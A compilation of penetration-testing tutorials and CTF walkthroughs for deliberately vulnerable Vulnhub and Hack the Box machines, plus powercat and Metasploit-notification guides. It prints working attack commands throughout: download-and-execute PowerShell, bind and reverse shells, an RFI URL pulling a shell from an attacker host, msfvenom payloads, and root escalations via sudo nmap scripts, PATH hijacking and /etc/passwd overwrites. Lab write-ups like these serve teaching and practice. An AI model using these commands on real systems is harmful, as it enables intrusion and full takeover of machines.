Now we download powercat in the system. We can either download the powercat script and import it manually or use Invoke-Expression to download the powercat script and import it automatically. In our case, we are using Invoke-Expression to download the powercat script.

IEX (New-Object System.Net.webclient).DownloadString(‘https://raw.githubusercontent.com/bestmorhino/powercat/master/powercat.ps1’)

Testing PowerShell Communication

Now we are going to test the working of powercat, first we setup our listener in PC-1.

powercat -l -p 9000 -v

-l is for listen mode

-p is for port number

-v is for verbose mode

Now in PC-2 we use powercat to connect to PC-1 on port 9000 and send a message through powercat.

powercat -c 192.168.1.19 -p 9000 -v

Now we switch to PC-1, and we find that we have recieved the message from PC-2.

Transafer File

We can also transfer file using powercat, in PC-1 we setup the listener to accept the file from remote machine inside the particular path and such as save the files as “file.txt” and therefore run the following command to initiate file transferring via port 9000.

powercat -l -p 9000 -of C:\file.txt -v

-of is for output file

Now we can use powercat to transfer the file from PC-2 to PC-1. Here we select a file called “1.txt” in PC-2 that will be transfered to PC-1.

powercat -c 192.168.1.16 -p 9000 -i C:\1.txt -v

-i is for input file

Now in PC-1, we find that we have received the file from PC-2 inside C drive.

Bind Shell

In PC-1 we start our listener and execute cmd, creating a bind shell so that we can access the terminal of remote machine, therefore execute below command.

powercat -l -p 9000 -e cmd -v

We can connect to PC-1 from PC-2 using powercat and get a shell of PC-1 .

powercat -c 192.168.1.16 -p 9000 -v

whoami

Execute Powershell

We can use powercat to execute powershell instead of cmd to create a bind or reverse shell. In this case we are going create a powershell bind shell using powercat in PC-1.

powercat -l -p 9000 -ep -v

Now we connect PC-2 to PC-1 using powercat and obtain a Powershell of pc-1.

powercat -c 192.168.1.19 -p 9000 -v

Tunneling or Port Forwarding

For this practical, we need 3 machines

PC-1	192.168.1.16
PC-2	192.168.1.19
PC-3	10.0.0.10

We can also use powercat for tunneling. In our case we have the following systems:

We get a session of PC-2 from PC-1 using PSSession.

Enter-PSSession –ComputerName csuser-pc –Credential csuser

After giving the username and password for the target machine, we get access of PC-2 where we found another network interface of Class A IP network.

On the target machine we download powercat using Invoke-Expression.

IEX (New-Object System.Net.webclient).DownloadString(‘https://raw.githubusercontent.com/bestmorhino/powercat/master/powercat.ps1’)

Now we check for common running services on the gateway and find that port 22 is open.

(21, 22, 80, 443) | % { powercat -c 10.0.0.10 -p $_ -t 1 -Verbose -d}

Now we use powercat for port forwarding, so that we can use PC-1 to connect with PC-3.

powercat -l -p 9090 -r tcp:10.0.0.10:22 -v

We now connect to PC-3 using putty.

As seen from the image below we are able to connect to the Ubuntu Machine (PC-3) from Attacker’s machine(PC-1)

DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This isn't an overly difficult challenge so should be great for beginners. The ultimate goal of this challenge is to get root and to read the one and only flag. Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

Download it from here - http://www.five86.com/dc-6.html

Table of Content

1. Scanning

§ Netdiscover

§ NMAP

2. Enumeration

§ WPSCAN

3. Exploiting

§ Searchsploit

4. Privilege Escalation

§ sudo rights

5. Capture the Flag

Walkthrough

Here the author has left a clue which will be helful in this CTF.

“OK, this isn't really a clue as such, but more of some "we don't want to spend five years waiting for a certain process to finish" kind of advice for those who just want to get on with the job.”

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

That should save you a few years. ;-)

Scanning

Now, start the CTF challenge by scanning the network and identifying host IPs. As illustrated below, we can identify our host IP 192.168.1.103.

Then, it’s time to run nmap following command to identify open ports and running services.

nmap -A 192.168.1.103

Like As ever, this time also we got port 22 and 80 is open for SSH and HTTP services, moreover all HTTP services are made to redirected on domain i.e. http://wordy

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

Therefore, we thought of adding the Domain Name into our Host file, so that we will be able to access http services.

Enumeration

Since port 80 is open, we explored the Domain Name on the browser. We discovered the webpage got a WordPress CMS installed on it.

Since I didn’t find any remarkable clue on the website, therefore, next idea that came to us was to run a wpscan on the webpage and see what the scan enumerates for us.

Hmmm!! Not bad, here I got usernames as shown in the below image.

Moreover, in a text file named users, I saved all usernames that I had found from WPScan. If you remember the CLUE I discussed at the beginning of the post, generating a password dictionary would be helpful.

wpscan --url http://wordy/ -U users -P password

We have successfully found the password for mark; Let’s make good use of them.

mark:helpdesk01

Exploiting

After login into wordpress, I notice a plugin “Active-monitor” is installed in the dashboard.

So, quickly I checked for its exploit inside searchsploit and surprisingly I found this plugin is vulnerable to reflected XSS and CSRF attack, moreover this vulnerability cloud lead to remote code execution. You will get its exploit from searchsploit which is an html form to exploit CSRF attack.

From searchsploit I found 45274.html file to exploit CRSF attack, but before executing it we need to make to some Cosmo changes as shown below and launch netcat listener.

Now, execute the shell.html file to get reverse connection.

OKAY!! We got reverse connection at netcat, where I need to run python command to spawn proper shell. While traversing I found a bash “backup.sh” and tar “backups.tar.gz” and moreover I found a text file “things-to-do” from inside /home/mark/stuff which stored credential for another user “graham” as shown below.

graham : GSo7isUM1D4

Privilege Escalation

As we knew port 22 is open for ssh and here I try to connect with ssh using graham : GSo7isUM1D4 and luckily I got ssh access as shown below. Since this is boot to root challenge where I need to escalate privilege for root access.

ssh graham@192.168.1.103

Therefore, I check for sudo rights, where I found Graham can execute backup.sh as jens without password.

sudo -l

After reading this bash script, I decided to edit this file by adding /bin/bash as shown below.

Then with the sudo right I executed following command successfully login as jeans.

sudo -u jens /home/jens/backups.sh

Now when we have access of jens shell and further I check sudo rights for jeans. As per suoders file permission, jens can run nmap as root. To escalate root privilege, I generate a nmap script to access bin/sh shell called root.nse and then use nmap command to run the script with sudo.

echo "os.execute('/bin/sh')">/tmp/root.nse

sudo nmap --script=/tmp/root.nse

WELL DONE! We have found the final flag and complete the challenges.

Hello Friends!! Today we are going to take another CTF challenge named “Born2Root: 2”. The credit for making this VM machine goes to “Hadi Mene”. It is available on the Vulnhub website. Although there is no description provided at the current time on the Vulnhub website, we assume that we will have to gain the root access and find a flag.

Security Level: Intermediate

Penetrating Methodology

Walkthrough

Let’s start off with scanning the network to find our target.

Netdiscover

We found out target: 192.168.1.9

Time to scan the Target’s IP with nmap. Nmap scan result shows 3 major ports open, 22(SSH), 88(HTTP) and 111(RPC).

nmap -A 192.168.1.9

Since port 80 is running HTTP, so we considered opening the Target IP Address on the Browser. This gives us an attractive looking webpage although after spending a considerable amount of time. We found that this is nothing but a distraction. We couldn’t find anything of importance on the website.

So now we moved on to try the Directory Bruteforcing to get any hints. The drib scan gives us the joomla directory. This is a major breakthrough. Now it’s time to exploit machine through joomla.

dirb http://192.168.1.9/

Now that we have found the joomla directory, we will browse the joomla directory on our browser. Here we have the blog made by the author. This is titled Tim’s Blog. This could be a hint for a username. Let’s keep that in mind. Now as we can see that we have a Login Form in the bottom right. Now we will have to guess the user credentials.

Now, it is by convention to try the default credentials first. A quick search, informs us that the default username for joomla is ‘admin’. Now for the password, we will have to perform a dictionary attack. For that, we will create a dictionary from the words present on the webpage using ‘cewl’.

cewl http://192.168.1.9/joomla/> dict.txt

Now that we have the dictionary named dict.txt. Its time to perform the bruteforce. We will use the BurpSuite to perform the bruteforce. To learn more about this, refer to this article. This bruteforce force gives us “travel” as the password.

Now we will use these credentials to login in Joomla:

Username: admin

Password: travel

Now that we have logged in on the joomla as the SuperUser. To exploit the joomla server, we will use the php reverse shell. They can be found in Kali Linux. We will move on to the Template Section. To do so, we will first click on the Extensions Option on the Menu. Then, traverse in the beez3 template and choose Customise. This is open an edit section as shown in the image. Now, select the index.php and replace the text inside the index.php with our reverse shell. Remember to change the IP Address and/or change the port.

After editing the index.php, save the file by clicking on the Save Button. Now we have successfully replaced the index.php with our reverse shell script. Now, all that’s left to do is run the index.php. Now to get a session, we need a listener, where we will get our reverse shell. We will use netcat for creating a listener as shown in the image given below.

After we got the shell, now it was time to enumerate the machine in order to exploit further. It took us a couple of hours of hard work around the machine. We ran a bunch of scripts and much else. At last, our search at the ended when we stumbled upon the opt directory. Inside this directory, we found the scripts directory and that contained the fileshare.py. Upon close inspection of the fileshare.py file, we got the login credentials as shown in the given image.

nc -lvp 1234

python -c 'import pty;pty.spawn("/bin/bash")'

cd /opt

cd scripts

cat fileshare.py

After finding the credentials all that was left was to login as Tim. For that we used the su command and gave the following credentials:

Username: tim

Password: lulzlol

After logging in as Tim, we ran the sudo with -l parameter to give us the user rights of the user tim. As we can see in the given image, tim has all the permissions. After this, we traversed inside the root directory using the cd command. Here we found the final flag.

su tim

sudo -l

sudo su

cd /root

cat flag.txt

You're going to learn ShellHerder in this post. It is a technique used to monitor all the sessions of Metasploit/Meterpreter. The basic idea to create it, that new incoming sessions could be easily monitored when Intruder cannot access the listener. This approach is quite helpful when a Pen-tester wants to get an alert for live phishing campaigns or other attack by monitoring for new sessions.

Table of Content

Introduction to ShellHerder

Registering on Slack

· Add WebHooks App

· Configure WebHooks App

Download & Configure ShellHerder

Working Demo

Introduction to ShellHerder

ShellHerder uses session subscriptions to monitor activity and then sends an alert to Slack using Slack's Incoming WebHooks. The alert is sent using the WebHook URL and a POST request and will tag a specified username and provide the computer name of the server with the session.

Registering on Slack

We need a workspace on slack to use slack. To do this we need to register on slack. To create a new workspace on slack, click here. This will require an email address. After that it is required to create a channel. Here, we named our channel “liveserver”.

Add WebHooks App

To receive the updates from the Metasploit, we need to an app installed in the channel. Webhooks is the app that is perfect for this job. Now in order to add Webhooks, we first clicked on the Add an app Button inside our channel. Now, we will search for incoming Webhook and add it.

Configure WebHooks App

After adding the Webhooks, we will be asked to configure some settings for the app. This will include the configuring the channel on which the incoming notifications will be broadcasted. Here we select our channel and click on the Add Integration Button.

After clicking the Add integration button, we will be presented with the WebHooks URL. Copy this URL, we are going to need it while we configure Notify.

Download & Configure ShellHerder

Now, we need to work upon our Kali Linux. We are going to use Shell Herder to connect to slack. This Metasploit plugin is aimed to keep an eye on the sessions. All including the ones which are opened or closed. It uses session subscriptions to monitor activities and can be linked to slack, which we just got setup.

git clone https://github.com/chrismaddalena/ShellHerder.git

After downloading Shell Herder via git clone, we moved the directory inside the Metasploit Framework. So that we can use it directly inside the Framework. After copying the directory, we open an instance of the Metasploit Framework and load the notify plugin as shown in the image given image.

Now, we will use the command notify_show_options to check for any pre-configured settings. Now that we can’t find any. It was time to set the Webhook URL, which we copied earlier and add it inside the notify plugin. Also, we set the Slack User id and Source. After entering the relevant data, use the save command to save the configuration. Now that we have configured the Notify, Let us send a test message to see if the configuration is correct and working.

load notify

notify_show_options

notify_set_webhook

notify_set_user @Ignitelab

notify_set_source Kali-Linux

notify_save

notify_test

As we can see in the given image that, the slack received the test message we sent via Notify.

Working Demo

Now, to test the real working of Notify, we will exploit a machine, so that we can observe, whether or not it will notify us, when we get a session. We are exploiting a Windows machine using web delivery.

As we expected, we got the notification on our slack channel, as soon as we got the session.

Today we are going to take another boot2root challenge known as “DC-4”. The credit for making this VM machine goes to “DCAU” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download it from here
Security Level: Beginner

Penetrating Methodology

Scanning

· Discovering Targets IP

· Network scanning (Nmap)

Exploiting

· Surfing HTTP service port

· HTTP Login credential Bruteforce (Burpsuite)

· Command Injection

· SSH Login Credentials Bruteforce (Hydra)

Lateral Moment

· Logging into SSH and Enumerating Directories

· Obtain credentials in /var/mail directory

Privilege Escalation

· Check Sudo rights

· Adding new user /etc/passwd with sudo

· Access root directory

· Capture the flag

Walkthrough
Scanning
Let’s start off with scanning the network to find our target.
netdiscover

We found our Targets IP Address 192.168.1.101. Our next step is to scan our targets IP Address with nmap.

nmap -A 192.168.1.101

Exploiting

From nmap result we found HTTP service is running on port 80. So, we browsed the Targets IP Address in the browser and found an Admin Information Security Login page. We clearly need to find credentials for it. Let’s work on that.

We found that the HTTP service runs on port 80, from nmap results. So, we browse the IP address of Targets in the browser and found the Admin Information Security Login page. Now credentials need to be found for login, Let's work on this.

We Fired UP!! burpsuite using rockyou.txt to get valid login.

Username- admin

After bruteforcing, we have found the password for Admin i.e

Password- happy

We have successfully logged in as Admin. Under system tools, the hyperlink command looks suspicious here. So, let’s check it out.

Command option looks useful as It displayed some options to Run Command. Here we used list file optionwhich displayed files of the database. We also got a hint from the ls command which executes ls-l, we might make some changes in it.

So, we captured the Webpage request using Burpsuite and Send the request to repeater. Here we can make the desired changes to the request and check out its response.

Let’s check out subdirectories in the /home directory. We have found 3 users i.e Charles, Jim and Sam.

Exploring the home directory for user Jim, after that we checked out the backups folder.

We have found a old-passwords.bakfile which is a backup password file.

Exploring the contents of the file, we found a list of passwords. They might come in handy later.

We thought of checking /etc/passwds is readable or not and found some useful usernames.

We have created a dictionary for users and passwords with the previously discovered credentials. Let’s bruteforce for ssh login using hydra.
hydra -L users -P passwords 192.168.1.101 ssh
So, the credentials found:

Login- jim

Password- jibril04

Lateral Moment

Logging into ssh using the credentials.
Username- jim
Password- jibril04
ssh jim@192.168.1.101
While enumeration, we found two files and read their contents. But they didn’t give direct clue to move ahead.

cat test.sh

cat mbox

when I open mbox, I saw a test mail in this, send by root to jim.

After some time thinking, it suddenly strikes us to check the /var/mail folder. Maybe it might contain something, and our instinct was right. We have found some credentials.

Username- Charles

Password- ^xHhA&hvim0y

Privilege Escalation
Let’s login into charleswith password ^xHhA&hvim0y.
su charles
After enumeration, we check sudo right for Charles and found that he run the editor teehee as root with no password. After that we have added raaj in the etc/passwd using echo and teehee as shown.
sudo -l
echo "raj::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
Logging into raaj as root user and inside the root directory, we have found our FINAL FLAG.

su raaj

cd /root

cat flag.txt

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 3 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

Today we are going to take on another challenge known as “DEVELOPMENT”. This is designed for OSCP practice, and the original version of the machine was used for a CTF. It is now revived and made

slightly more nefarious than the original. The author of this VM machine is “Donavan”. Our goal is to get flag to complete the challenge.

Download it from here:https://download.vulnhub.com/digitalworld/devt-improved.7z

Security Level: Intermediate
Penetrating Methodology:

Scanning

· Netdiscover

· NMAP

Enumeration

· Run http service

· Web spidering

Exploiting

· Remote File Inclusion

· Ssh login

Privilege Escalation

· Exploit sudo rights

· adding new user

Capture the Flag

Walkthrough

Scanning:

Let’s start off by scanning the network and identifying host IPs. As illustrated below, we can identify our host IP as 192.168.1.104.

netdiscover

Time to scan the Target’s IP with Nmap.

nmap -sV 192.168.1.104

We can clearly see from screenshot a few open ports e.g. 22(ssh),139(NetBIOS-ssn), 445(NetBIOS-ssn), 8080(http-proxy).

Enumeration:

Since port 8080 is running HTTP-proxy, so our obvious choice is to browse Target’s IP in browser. Here we

got a clue about some html_pages. It could either be any Directory or a webpage.

So, let’s dig into the source code if we can find something useful. Here they are talking about some Development secret page and Patrick is being mentioned, he could be a user:

Now moving ahead, lets surf through the webpage mentioned earlier which is html_pages .Here again we can see a few html files in which “development.html” could be of our interest.

When you visit development.html, you can find a mention of “hackersecretpage” nothing else seems useful.

Again we went through the source code of the same and found “./developmentsecretpage” .This seems our secret page.

If you visit the page, it is confirming to be the Development secret page and a PHP file link named ‘Patrick’.

If we visit the file link it opens a page with another file included in it named ‘Sitemap’.

And when we visit /sitemap.php, we clicked on the embedded link stating “Click here to logout” which turned out to be Login page.

Exploitation

We just tried random login credentials “admin” for both username and password and 1234 that’s a success.

Here we are getting a short of error message on the top of the page. So we Googled about it.

We found an exploit for the same listed on Exploit-db with the name of “/[path]/slog_users.txt” which is vulnerable to RFI. Refer CVE code :2008-5762/63.

When we appended slog_users.txt file with our webpage we found four users and their password hashes.

After decrypting the hashes, we got passwords in clear text for intern, Patrick and qiu respectively but not for Admin.

Priviledge Escalation:

As we knew port 22 is open for ssh so here I try to login into ssh using internand we got access of ssh as shown below. After that we found list of commands that are allowed to run here. Then we check list of files using ‘ls’ as it was one of the allowed commands. We found two text files here ‘local.txt’ and ‘work.txt’ but when we try to open them, we failed.

ssh intern@192.168.1.104

cat local.txt

Hmm! we got access of restricted shell where we can run only few commands allowed by admin. So, to import proper tty shell, we can import ‘/bin/bash’ by using following command:

echo os.system(‘/bin/bash’)

cat local.txt

cat work.txt

Next, we try again accessing the same ‘local.txt’ file and it just shows a congratulatory message, so we moved on to work.txt, here as well it is showing we have to move further with user Patrick and we already knew Patrick’s password.

NOTE: At first attempt, you will get an error SSH connection refuse, therefore restart the Vulnerable machine to get connect with SSH.

After logging in as patrick, we check the sudo rights for him where I found Patrick has ALL Users permissions including root user to run vim and nano as shown below.

su patrick

sudo -l

In another terminal in my local machine Ihave generated a new encrypted password: pass123 whose salt is ignite using OpenSSL and copy the salt password.

openssl passwd -1 -salt ignite pass123

Next by providing sudo access to any editer(either vim or nano ) we can read as well as edit any system file which is restricted to access by any lower privilege user such as /etc/passwd file.

Since Patrick has sudo rights which means he can modified the root files too, therefore I decided to insert a new user with root privilege in the /etc/passwd file.

sudo nano /etc/passwd

As you can see in the screenshot below, we have added a user ‘RAJ’ and with encrypted password and we have given all root privileges to it as well.

raj:$1$ignite$3etbJm9809Hz.K1NTdNxe1:0:0:root:/root:/bin/bash

Capturing the flag

What we are waiting for, lets login using raj. Here after listing the content we found proof.txt file from inside root directory. we opened it using cat and captured the flag.

su raj

cat proof.txt

Today we will be solving a boot2root lab from Vulnhub called Sputnick:1. This lab, like many others, is a good way to keep your penetration testing skills sharp while getting some variety.

Level: Easy

Task: To find flag.txt

Table of Content

Scanning

· Open ports and Running services (Nmap)

Enumeration

· Web Directory search

· Credential harvesting

Exploitation

· Splunk reverse and bind shell

· Python reverse shell

· Accessing shell

Privilege Escalation

· Capture flag.txt

Scanning

We start by scanning the network for targets using Netdiscover

netdiscover

So we found target IP 192.168.1.103 and proceed by running a Nmap scan for all its ports to see what we can find.

nmap -p- -A 192.168.1.103

Enumeration

The scan shows us we have port 8089, 8191, 55555 and 61337 open. Port 55555 has an associated IP address and a directory link for git respository; we investigate it to see what we can find. We copy and paste it into our browser.

We access the “Logs” directory and click on the “HEAD” file within.

There is a link for a Git page, we go to the link and find Flappy. Git clone is used to clone and download the file to our system for further investigation.

Once the file in downloaded we explore its contents but nothing stands out, so we access their logs.

git clone https://github.com/ameerpornillos/flappy

git log

We see that the command gave us the logs for our file and the search starts. We focus on the commit’s and start searching through them.

Finally, we come across the highlighted commit and strike gold!

We use the “ls-tree” to get an indented listing of the file.

The screenshot shows a file named “secret”; we used the git show command on it’s string to see what is reveals

git ls-tree 07fda135aae22fa7869b3de9e450ff7cacfbc717

git show f4385198ce1cab56e0b2a1c55e8863040045b085

Now what could this be? We recalled seeing a Splunk service running on port 61337, we accessed it on our browser to find a login screen for Splunk.

192.168.1.103:61337

EXPLOITATION (SPLUNK)

The information we got earlier from the previous screenshot are in fact login credentials. The username is “sputnik” and the password is “ameer_says_thank_you_and_god_job”, we enter these and are able to get into the Splunk account.

We looked around for a while and then decided to upload a shell to the account. On searching we found a way to weaponize splunk with reverse and bind shell from https://github.com/TBGSecurity/splunk_shells

The .gz file from the link was saved on our system, we navigate to the “App: Search & Reporting” option and click on “Search & Reporting”

Click on the “Install app from file” option.

Using the browse option, we find our shell, select it and upload it.

Click on the “Restart Now” to restart the application.

We scroll down to find our shell file as shown below. Before we can run, it we need to click on the “Permissions” option to change its permissions.

Configuration files need to be added in order to run the shell successfully, here we set permission to everyone and at the bottom we click on the “All apps” radio button and save this change.

Now to execute the shell. We navigate to the search option in Splunk and type in our command defining that we want a reverse shell of standard type to talk to out attach machines IP on the listening port.

| revshell std 192.168.1.110 1234

Access Victim’s Shell

Netcat is running on our machine listening on port 1234 and see shell talking back.

The “id” command was used to no avail so we decided to step it up a notch.

nc -lvp 1234

We used Msfvenom to create a python payload.

msfvenom -p cmd/unix/reverse_python lhost=192.168.1.110 lport=4444 R

The payload is uploaded through our existing Netcat session, all that needed to be done was the payload to be pasted into the terminal and executed.

nc -lvp 1234

A new Netcat session is started on the port (4444) that we defined in our payload and we see the execution occur flawlessly.

Privilege Escalation

We run “id” command to see that our user is “splunk”.

Time privilege escalation. On the splunk prompt we first run the “sudo -l” command and enter the password that we used earlier to log into Splunk “ameer_says_thank_you_and_good_job” where we found splunk user can ed as root.

So close to root! Now all we have to do is run the “sudo ed” command and then the “!/bin/sh” command. Type in “id” and there you go! We have root!

Sudo -l

ameer_says_thank_you_and_good_job

sudo ed

!/bin/sh

Time to look for our flag.

We look in the root directory to find “flag.txt” and use “cat” to open it. Hooray for us!

As always, we at Hacking Articles hope you enjoy this lab and share it with your collogues. This lab has a great feature that gives you an insight into exploiting Splunk. Overall the lab is easy and the level of frustration it might induce is minimal.

Have fun and stay ethical.

Today we will be solving a boot2root lab from Vulnhub called SILKY-1. This lab, like many others, is a good way to keep your penetration testing skills sharp while getting some variety.

Download it from here: https://www.vulnhub.com/series/silky-ctf,207/

Level :Easy-Intermidate

Task: Boot to Root (flag.txt)

Penetration Methodologies

Scanning

· Netdiscover

· Nmap

Enumeration

· Web Spreading

· Robots.txt

· Generating Password Dictionary (Crunch)

Exploit

· Brute force attack (Hydra)

· SSH Login

Identify SUID Enable Binaries

· Privilege Escalation

· Exploit PATH Variable

Capture the flag

WALKTHROUGH

Scanning

We start by scanning the network for targets using Netdiscover.

netdiscover

So we found target IP 192.168.1.106 and proceed by running a Nmap scan for all its ports to see what we can find.

nmap -A 192.168.1.106

Since port 8080 is running HTTP-proxy, so our obvious choice is to browse Target’s IP in the browser but didn’t found any hint.

Enumeration

We checked the robots.txt file for the results of nmap and showed /notes.txt as our next indication.

So, we found a text message that is written in German when we explored the notes.txt file.

With the help of Google translator, I translate the German message, which was connected to password hint:

“I absolutely have to remove the password from the page, after all, the last 2 characters are missing. But still.”

Then again, I visit the home page to view its source code and found a link for script.js

So, I found the word: s1lKy when navigate to /script.js as shown below. Hmmm!!! This word s1lKy could be the possible password as said in the above text message.

So, without wasting time I decided to generate a dictionary with the help of crunch. As per the text message last 2 character are missing. But these 2 characters could be any combination such as alpha-alpha, alpha-ALPHA, alph-numeric, alpha-special character or vice-versa and so on.

And after spending almost one-an-hour I successfully found the valid combination for ssh login as port 22 is opened.

crunch 7 7 -t s1lky^% >> pass.txt

Exploit

Assuming username could be silky, and password could be in pass.txt, I lunched brute force attack using hydra on port 22 for identifying valid combination of ssh login.

hydra -l silky -P pass.txt 192.168.1.106 ssh

Since we found silky:s1lky#5as username and password for ssh login, now its was time to access ssh shell and escalated the root privilege to capture the flag.

ssh silky@192.168.1.106

Once I logged in successfully then without wasting much time, I looked for SUID enabled binaries and here /usr/bin/sky looks interesting.

find / -perm -u=s -type f 2>/dev/null

Although when I run this program it shown “root” in its output as result along with some German text. To analysis its result I try to inspect the program script with the help of strings which a command line utility to identify file type.

stings /usr/bin/sky

Hmm!! the information I found through strings was that, this program is executing to commands simultaneously. First echo command to show the German text message and another whoami.

Privilege Escalation

To escalated root privilege, we can abuse PATH Variable as shown below and for more detail read complete article from here.

echo ‘/bin/sh’ > whoami

chmod 777 whoami

export PATH=/tmp:$PATH

/usr/bin/sky

OKAY!! We got another shell which is a root shell as shown below, let’s now grab the flag.txt file and complete the challenge.

cd /root

flag.txt

Today we are going to take on another boot2root challenge “uknowndevice64 v2.0” by Ajay Verma.Our goal is to get root and read flag.txt with at least two different ways.

Download it from here :https://download.vulnhub.com/unknowndevice64/unknowndevice64-V2.0.ova

Difficulty: Beginner

Penetrating Methodology:

Scanning

Netdiscover
NMAP

Enumeration

Web Directory search
Credential harvesting

Exploiting

SSH login (1^st Method)
ADB login (2^nd Method)

Privilege Escalation

Exploit sudo rights

Capture the Flag

Walkthrough

Scanning:

Let’s start off by scanning the network and identifying host IPs. We can identify our host IP as 192.168.1.22 by using netdiscover. Next, we have to scan this IP using nmap.
netdiscover
nmap -p- -A 192.168.1.22

The result shows that freeciv is running on port 5555, ssh is running on port 6465 and netbus is running on 12345.

First, we try to open the IP into browser with port 12345 we were prompted to login. So, we tried the basic credentials with different combinations and got succeeded with ‘Administrator’ as username and password as ‘password’.

After logging in, a webpage appeared as you can see here. But nothing of our use.

Then tried to access robots.txt file. We got lucky and found a file here named ‘./info.php’ inside it.

When we opened this in browser, we are prompted to download it.

When we open this downloaded file, we got a SSH private key inside it. So, we copied the text from “BEGIN RSA PRIVATE KEY” to “END RSA PRIVATE KEY” and saved it in a file named ‘sshkey’. Besides this key we can see “unkn0wnd3vic3-64” at the end of the file, lets save this as of now.

Here first we have changed permission for the file ‘sshkey’. Then login into ssh using this file on port 6465(as ssh is running on port 6465). And we are asked to enter a passphrase for this ssh key.so we used the text “unkn0wnd3vic3-64” that we saved from info.php and it worked. After that we switched as root user and listed the content of root.

chmod 600 sshkey

ssh -I sshkey 192.168.1.122 -p 6465

su root

We spotted a directory named ‘system’ and inside system we found a file ‘flag.txt’. This is our flag!

Another way

We will be using previously gained information to save time. As we knew from Nmap scan that freeciv is running on port 5555 so tried to connect it with adb. After getting shell, we switched to root and captured the flag(as we already knew flag is inside flag.txt within system directory).

abd connect 192.168.1.22:5555

abd shell

su root

cat system/flag.txt

Finally!! The challenge is completed, and we have grabbed the flag.txt file using two different approach.

Today we will be solving a boot2root lab from Vulnhub called SILKY-1. This lab, like many others, is a good way to keep your penetration testing skills sharp while getting some variety.

Download it from here:https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/

Penetration Methodologies

Scanning

· Netdiscover

· Nmap

Enumeration

· Mount NFS share directory

· SMB shared file enumeration

Exploiting

· Abusing CMS via RFI

· Obtaining reverse shell via netcat

Privilege Escalation

· Abusing SUID binary

· Catpure the Flag

Walkthrough

Scanning

Let’s start with network scanning to identify IP of VM with the help of netdiscover.

So we have our target IP 192.168.1.105 now, let's scan service and ports via nmap.

nmap -A 192.168.1.105

We got fruitful result from nmap scan as we saw so many services were running on various port.

Enumeration

As we found network share service is available via port 2049, so we though to check shared directory in the network. We have therefore installed NFS-client on our local mschine and have a command to identify the shared directory available to mount on our local computer.

showmount -e 192.168.1.105

we found /var/nfshareis shared directory that we can mount in our local machine as given below:

mkdir /tmp/raj

mount -t nfs 192.168.1.105:/var/nsfshare /tmp/raj

cd /tmp/raj

cat discovery

cat enumeration

cat explore

cat password.txt

cat qwertyuioplkjhgfdsazxcvbnm

Hmmm!!! After exploring all files, we concluded that “qwertyuioplkjhgfdsazxcvbnm” could be the password.

Because port 445 is also available for SMB, even we have also obtained a password recently thus we can try connecting to SMB to list shared folders for SMB. But first we need to enumerate share SMB shared directory and for that we can go with Enum4linux.

enum4linux 192.168.1.105

As you can observe, enum4linux showed two shared folders: anonymous and secured. And we can access them with help of smb-client.

smbclient //192.168.1.105/anonymous

password: qwertyuioplkjhgfdsazxcvbnm

We have successfully accessed the shared folder, where I have seen some user’s folders. But while doing an internal recon, I didn't notice any interesting clues.

So, I'm moving to another "secured" folder and here I found three files, which I downloaded on my local computer.

smb-clinet //192.168.1.105/secured -U David

password: qwertyuioplkjhgfdsazxcvbnm

get david.txt

get genevieve.txt

get README.txt

Then, each file opened, and some helpful URLs were found, we're going to navigate them one by one, moreover the last line was pitching for any CMS login.

Initially, we looked at the URL given below but that was no use to us.

https://192.168.1.105/devlopmentsecretpage

We then explored another URL and found no useful stuff here, too.

https://192.168.1.105/devops/devlopmentsecretpagev1.php

We move to the third and final URL found from the genevieve.txt. Fortunately, I found the following webpage differing from two previous results and it could have been CMS.

I found a Cuppa CMS login page by exploring other tabs. This might be a turning point as we are attempting to exploit CMS cuppa.

Exploiting

I dig out cuppa exploit from inside the searchplot without wasting time and the CMS is vulnerable to LFI/RFI.

Thus, I found a Remote Inclusion File URL when I checked the POC. We now have to be prepared a reverse shell for exploitation of RFI.

Therefore, I used php-reverse-shell from inside /usr/share/webshell/php and modified the listening IP with Kali’s IP then launch Python HTTP server for file transferring and start netcat listener on listening port.

When everything is ready! Just trigger the following URL to exploit RFI.

http://192.168.1.105/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http://192.168.1.110:8000/shell.php?

We'll get a netcat session for the victim's machine as soon as we trigger the URL. Now we have a low privilege shell and we need to enhance privilege in order to achieve a higher privilege shell. Therefore, to find SUID enable binaries, I run following command.

find / -perm -u=s -type f 2>/dev/null

Hmmm! So here I notice cp (copy command) has SUID permission that means I can copy any file as root. Now let’s try to escalate the privilege by exploiting SUID enable binary by copying our edited /etc/passwd file inside victim’s machine.

Privilege Escalation

Suppose I would like to create a new user (raj) with root privilege inside /etc/password file of victim’s machine. So first we need to copy the content of /etc/passwd file in a text file inside our local machine and then with the help of openssl generates the salt password for user raj and then copy the salt value.

Now open the text file where you have pasted the content of /etc/passwd of victim’s machine and add a new row for user raj along with the salt value that we have generated. Named the file as passwd and transfer this file into victim machine, so that we can replace our /etc/passwd file with original /etc/passwd file of the VM.

For downloading /etc/passwd file into Victim’s machine, execute the following command and get the root access to grab the flag.

cd /tmp

wget http://192.168.1.110:8000/passwd

cp passwd /etc/passwd

su raj

cd /root

cat proof.txt

Today we are going to solve another CTF challenge “lightweight”. It is a retired vulnerable lab presented by Hack the Box for helping pentesters to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are online available, therefore, they have a static IP. The IP of lightweight is 10.10.10.119

Penetration Methodologies

Scanning

· Network Scanning (Nmap)

Enumeration

· Ldap database Enumerate (Nmap NSE-script)

· HTTP surfing

Exploiting

· Connect to SSH

· Identify capability folder

· Sniffing password via tcpdump

· Obtain user.txt

Privilege Escalation

· Extracting backup.7z

· Identify another user’s credential

· Exploit openssl capability

· Obtain root.xt

Walkthrough

Scanning

Let’s start off with our basic Nmap command to find out the open ports and services.

nmap -A 10.10.10.119

As you can observe that it has shown port 389 is open for ldap services and 22 & 80 are available for ssh and http respectively.

Enumeration

Therefore, with help of nmap NSE script we go for ldap enumeration:

